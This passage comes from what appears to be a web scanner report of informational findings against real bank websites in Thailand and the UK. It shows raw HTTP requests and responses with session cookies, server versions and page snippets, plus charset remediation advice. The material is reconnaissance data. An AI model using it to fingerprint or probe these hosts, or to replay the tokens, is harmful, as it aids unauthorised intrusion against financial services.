   window.navigate ('https://csc.scb.co.th/webclient1/index.jsp');
}
</Script>
<body onLoad="redirect();">
</body>
</html>

30.3. https://csc.scb.co.th/webclient1/bcm_signin.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://csc.scb.co.th
Path:   /webclient1/bcm_signin.jsp

Request

GET /webclient1/bcm_signin.jsp?language=en HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:18:36 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=B3C43FADCB6A264B281F22BCE4AD66BD; Path=/webclient1; Secure
Content-Type: text/html;charset=TIS-620


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<head>
<title>SCB BCM Customer Service</title>
<meta name="Keywords" content="csc.scb.co.th, scb.co.th, .......
...[SNIP]...

30.4. https://csc.scb.co.th/webclient1/cllcntr_en.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://csc.scb.co.th
Path:   /webclient1/cllcntr_en.jsp

Request

GET /webclient1/cllcntr_en.jsp HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:55:39 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=2B76E091D3134A07F2F9324059D9B802; Path=/webclient1; Secure
Content-Type: text/html;charset=TIS-620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Welcome to SCB Call Center</title>
<meta name="Keywords" content="csc.scb.co.th, scb.co.th, ................,
...[SNIP]...

30.5. https://csc.scb.co.th/webclient1/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://csc.scb.co.th
Path:   /webclient1/index.jsp

Request

GET /webclient1/index.jsp HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:55:46 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=CC747F2754B344B97C30E95EF0643E33; Path=/webclient1; Secure
Content-Type: text/html;charset=TIS-620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Welcome to SCB Call Center</title>
<meta name="Keywords" content="csc.scb.co.th, scb.co.th, ................,
...[SNIP]...

30.6. https://dimenxion.bangkokbank.com/bonprd/js/statusbar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dimenxion.bangkokbank.com
Path:   /bonprd/js/statusbar.js

Request

GET /bonprd/js/statusbar.js HTTP/1.1
Host: dimenxion.bangkokbank.com
Connection: keep-alive
Referer: https://dimenxion.bangkokbank.com/bonprd/jsp/common/loginfiles/es.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0a5f4b3e30d906ea09d615c548bda9fcfebdfa90866d.e38MchiTchqSb40LbxmSb3uLb30Se6fznA5Pp7ftolbGmkTy; _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2; ccms=10.95.56.51.1339466130445131735

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 19:35:19 GMT
Server: Oracle-Application-Server-10g/10.1.2.2.0 Oracle-HTTP-Server
Last-Modified: Mon, 13 Dec 2010 12:43:57 GMT
Accept-Ranges: bytes
Content-Length: 1303
Cache-Control: private
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Language: en

// ******** Status Bar Javascript Magic by Likno 1.0 **********

function statusbar_start() {clearInterval(statusbar.sttm);statusbar_init();if (arguments.length>0) statusbar_init2(arguments[0]);status
...[SNIP]...

30.7. https://ebank.kasikornbankgroup.com/kbiznet/login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebank.kasikornbankgroup.com
Path:   /kbiznet/login.html

Request

GET /kbiznet/login.html HTTP/1.1
Host: ebank.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:07 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 24 Feb 2011 11:45:06 GMT
ETag: "41d1-7557-bea93480"
Accept-Ranges: bytes
Content-Length: 30039
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerebankgroup_pool=436381888.47873.0000; path=/


<head>
<title>Welcome to K-BizNet</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<style type="text/css">
</style>

<link rel="stylesheet" href="/smestatic/c
...[SNIP]...

30.8. https://eprocurement.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://eprocurement.ktb.co.th
Path:   /

Request

GET / HTTP/1.1
Host: eprocurement.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:05 GMT
Last-Modified: Mon, 18 Dec 2006 06:47:36 GMT
ETag: "33858e-268-45863988"
Accept-Ranges: bytes
Content-Length: 616
Connection: close
Content-Type: text/html; charset=windows-874

<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>KRUNG THAI BANK PUBLIC COMPANY LIMITED e-Procurement</titl
...[SNIP]...

30.9. https://ksupplychain.kasikornbank.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ksupplychain.kasikornbank.com
Path:   /

Request

GET / HTTP/1.1
Host: ksupplychain.kasikornbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 03 May 2011 12:54:31 GMT
Content-length: 90
Content-type: text/html
Last-modified: Wed, 13 Aug 2008 12:03:48 GMT
Etag: "5a-48a2cda4"
Accept-ranges: bytes
Connection: close

<script>window.location="https://ksupplychain.kasikornbank.com/html/index.html";</script>

30.10. https://secure.wikimedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.wikimedia.org
Path:   /

Request

GET / HTTP/1.1
Host: secure.wikimedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12wm1
Cache-control: s-maxage=3600, must-revalidate, max-age=0
Last-modified: Tue, 21 Jul 2009 23:59:41 GMT
Vary: Accept-Encoding
X-Vary-Options: Accept-Encoding;list-contains=gzip
Content-Length: 6338
Content-Type: text/html; charset=utf-8
Via: 1.1 secure.wikimedia.org
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-e
...[SNIP]...

30.11. https://www.barclaysfantasyfundmanager.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.barclaysfantasyfundmanager.co.uk
Path:   /

Request

GET / HTTP/1.1
Host: www.barclaysfantasyfundmanager.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 03 May 2011 13:04:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=qcrph4m5vx2ymr3pf14yy545; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 50180


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head id="ctl00_ctl00_Head"><title>
   Home - Barclays Fantasy Investment Port
...[SNIP]...

30.12. https://www.bizpayment.ktb.co.th/epayview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bizpayment.ktb.co.th
Path:   /epayview/

Request

GET /epayview/ HTTP/1.1
Host: www.bizpayment.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:32 GMT
Content-type: text/html;charset=utf-8
X-HP-CAM-COLOR: V=1;ServerAddr=sMVxqLQOS+/Q3oBiJs7EtA==;GUID=1|x02TzA7tbiYpm9br7GTUIA3-tyKGZdPujnJ-HNYIRFg.|L2VwYXl2aWV3L2luZGV4LmpzcA..
Set-Cookie: JSESSIONID=N16N74kl8KmPjvQjKWXLGtGgG2SbBbqGGhm3rQgrkGPLvbQYVzJQ!1246557006; path=/
Connection: close
Set-Cookie: BIGipServerwww.bizpayment.ktb.co.th_ext=2925265162.47873.0000; path=/


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

30.13. https://www.ktb.co.th/internetservice/onlineAccountAction.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ktb.co.th
Path:   /internetservice/onlineAccountAction.do

Request

GET /internetservice/onlineAccountAction.do HTTP/1.1
Host: www.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _ctout6897=1; JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _uid6897=F468DC21.1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; _cbclose=1; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094; visit_time=440; _cbclose6897=1;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:38 GMT
Content-length: 4670
Content-type: text/html;charset=windows-874
X-powered-by: JSP/2.0
Set-cookie: JSESSIONID=b5ebc541426318ffffffffb76304a653d8574; Path=/internetservice
Connection: close
Set-Cookie: BIGipServerhttps.www.ktb.co.th=1163657482.47873.0000; path=/


<html>
<link href="css/style.css" rel="stylesheet" type="text/css">
<head>
<title>
KTB - Internet Service
</title>
<meta http-equiv="Content-Type" content="text/html; charset=w
...[SNIP]...

30.14. https://www.newcb.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newcb.ktb.co.th
Path:   /

Request

GET / HTTP/1.1
Host: www.newcb.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:45 GMT
Content-length: 16312
Content-type: text/html
Last-modified: Wed, 23 Mar 2011 08:43:57 GMT
Etag: W/"3fb8-4d89b2cd"
Connection: close
Set-Cookie: BIGipServerwww.newcb.ktb.co.th_ext=2858156298.47873.0000; path=/

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<link href="ncb.css" type="text/css" rel="stylesheet"/>
<title
...[SNIP]...

30.15. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/js/bank-online.html

Request

GET /cs70_banking/js/bank-online.html HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://www.scbbusinessnet.com/cs70_banking/logon/sbuser
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 12 Jan 2010 03:38:40 GMT
Accept-Ranges: bytes
Content-Length: 397
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

...<ul>
   <li><a href="http://www.scbeasy.com" target="_blank">EASY NET</a></li>
<li><a href="http://www.scbbusinessnet.com" target="_blank">BUSINESS NET</a></li>
   <li><a href="http://www.scb-fx
...[SNIP]...

30.16. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/js/scb-quick-link.html

Request

GET /cs70_banking/js/scb-quick-link.html HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://www.scbbusinessnet.com/cs70_banking/logon/sbuser
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 23 Jul 2010 15:05:31 GMT
Accept-Ranges: bytes
Content-Length: 1573
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

...<ul>
   <li><a href="http://www.scb.co.th/th/oth/rate.shtml" target="_blank">Interest Rates and Fees</a></li>
<li><a href="http://www.scb.co.th/scb_api/index.jsp" target="_blank">Exchanges Rate
...[SNIP]...

30.17. https://www.scbbusinessnet.com/cs70_banking/news/css/style.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/news/css/style.txt

Request

GET /cs70_banking/news/css/style.txt HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.scbbusinessnet.com/cs70_banking/news/en/scbbus-home-des.html
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:32 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 20 Jan 2010 06:33:24 GMT
Accept-Ranges: bytes
Content-Length: 7168
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

body{
   overflow-x:hidden;
}

.TextMainBlack {
   font-family: "Tahoma", sans-serif;
   font-size: 12px;
   font-style: normal;
   line-height: normal;
   font-weight: normal;
   font-variant: normal;
   
...[SNIP]...

30.18. https://www.scbbusinessnet.com/cs70_banking/news/en/scbbus-home-des.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/news/en/scbbus-home-des.html

Request

GET /cs70_banking/news/en/scbbus-home-des.html HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.scbbusinessnet.com/cs70_banking/logon/sbuser
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:28 GMT
Server: IBM_HTTP_Server
Last-Modified: Sun, 07 Feb 2010 02:22:32 GMT
Accept-Ranges: bytes
Content-Length: 5102
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Welcome to SCB BUSINESS NET</title>
<meta name="Keywords"
   content="scbbusinessnet.com, scb.co.th, ........
...[SNIP]...

30.19. https://www.scbeasy.com/1st_pg.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scbeasy.com
Path:   /1st_pg.html

Request

GET /1st_pg.html HTTP/1.1
Host: www.scbeasy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: t=o; ASPSESSIONIDACBQSACT=MCBGOFPDEKGAOMBCEOGBNAEE;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:54:01 GMT
Content-Length: 5050
Content-Type: text/html
Last-Modified: Fri, 27 Aug 2010 04:45:00 GMT
Accept-Ranges: bytes
ETag: "06e239ba245cb1:e90"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<html>
<head>
<title>SCB Easy Net</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">

body {
   background-color: #802DA8;
   background-image: url(im
...[SNIP]...

31. HTML does not specify charset  previous  next
There are 48 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


31.1. https://apps.barclays.co.uk/chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.barclays.co.uk
Path:   /chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027

Request

GET /chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027 HTTP/1.1
Host: apps.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454253315:ss=1304454071727; ssuserid=173.193.214.243.1304418119808638; mbox=check#true#1304436224|session#1304436163124-351101#1304438024;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:57:11 GMT
Server: Apache
Content-Length: 149
Connection: close
Content-Type: text/html

<html>
<body onLoad="document.redirect.submit()">
<form name="redirect" action="../webchat/chat_client_skin.php" method="get"></form>
</body>
</html>

31.2. https://csc.scb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://csc.scb.co.th
Path:   /

Request

GET / HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:55:47 GMT
Content-Length: 189
Content-Type: text/html
Content-Location: https://csc.scb.co.th/Default.htm
Last-Modified: Fri, 08 Aug 2008 19:05:45 GMT
Accept-Ranges: bytes
ETag: "61a9ddc289f9c81:1334"
Server: Microsoft-IIS/6.0

<html>
<Script language="Javascript">
function redirect()
{
   window.navigate ('https://csc.scb.co.th/webclient1/index.jsp');
}
</Script>
<body onLoad="redirect();">
</body>
</html>

31.3. https://feedback.live.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /default.aspx

Request

GET /default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsathome&P2=&P3=cfcache&P4=NOFORM&P5=B506C07761D7465D924574124E3C14DF&P6=Washington, District Of Columbia&P9=38.906898498%2f-77.028396606&P10=0&P11=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2f%3fFORM%3dFEEDTU HTTP/1.1
Host: feedback.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Tue, 03 May 2011 13:22:26 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

31.4. http://home.controlcase.com/piwik/piwik.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.controlcase.com
Path:   /piwik/piwik.php

Request

GET /piwik/piwik.php HTTP/1.1
Host: home.controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:22:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.1
Content-Length: 121
Connection: close
Content-Type: text/html

<a href='/'>Piwik</a> is a free open source <a href='http://piwik.org'>web analytics</a> alternative to Google analytics.

31.5. https://ibank.barclays.co.uk/olb/w/BasicAccessStart.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/BasicAccessStart.do

Request

GET /olb/w/BasicAccessStart.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:39 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:54:38 GMT; Path=/
Connection: close
Content-Length: 12864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

31.6. https://ibank.barclays.co.uk/olb/w/FeedbackOverview.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/FeedbackOverview.do

Request

GET /olb/w/FeedbackOverview.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:12 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:54:12 GMT; Path=/
Connection: close
Content-Length: 6937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...

31.7. https://ibank.barclays.co.uk/olb/w/ForgottenCardReaderBusiness.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/ForgottenCardReaderBusiness.do

Request

GET /olb/w/ForgottenCardReaderBusiness.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:40 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:54:39 GMT; Path=/
Connection: close
Content-Length: 17126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

31.8. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/IndividualSavingsAcctOverview.do

Request

GET /olb/w/IndividualSavingsAcctOverview.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:18 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:54:17 GMT; Path=/
Connection: close
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

31.9. https://ibank.barclays.co.uk/olb/w/LoanOverview.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/LoanOverview.do

Request

GET /olb/w/LoanOverview.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:17 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:54:16 GMT; Path=/
Connection: close
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

